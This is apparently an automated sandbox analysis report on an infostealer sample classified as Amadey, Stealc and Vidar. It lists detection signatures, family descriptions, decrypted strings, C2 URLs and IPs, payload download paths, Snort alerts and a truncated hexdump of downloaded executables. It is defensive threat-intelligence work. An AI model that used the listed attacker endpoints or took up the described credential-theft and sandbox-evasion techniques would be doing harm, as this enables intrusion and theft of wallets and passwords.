Windows Analysis Report
1jPL5zru3u.exe

Overview

General Information

Sample name: 1jPL5zru3u.exe
renamed because original name is a hash value
Original sample name: b3badd1cd2cba4f587bd6737d34d3569.exe
Analysis ID: 1464487
MD5: b3badd1cd2cba4f587bd6737d34d3569
SHA1: bc229f10399c3482df1faa98bf7074a4440e82a5
SHA256: 9c1c20db1d73c66795b9b49f39aff02d621dd06c05d7d3ea1007ac7bcbf3f3cd
Tags: 32exetrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 1jPL5zru3u.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll9 Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpsJ0 Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeData Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpi Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: 85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 1jPL5zru3u.exe.6980.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.7292.10.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php"]}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 1jPL5zru3u.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: lstrcatA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: OpenEventA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateEventA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CloseHandle
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: Sleep
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VirtualFree
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: lstrlenA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ExitProcess
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: user32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ntdll.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateDCA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: sscanf
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: HAL9TH
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: JohnDoe
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: DISPLAY
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: default
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalLock
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: HeapFree
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetFileSize
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalSize
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: Process32Next
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: Process32First
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: LocalFree
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: FindClose
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ReadFile
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: WriteFile
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CopyFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetLastError
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalFree
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: OpenProcess
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ole32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: wininet.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: shell32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: psapi.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: SelectObject
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: BitBlt
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C3D6C80
Uses 32bit PE files
Source: 1jPL5zru3u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49731 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49731 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49731 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49743 -> 77.91.77.82:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:31:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 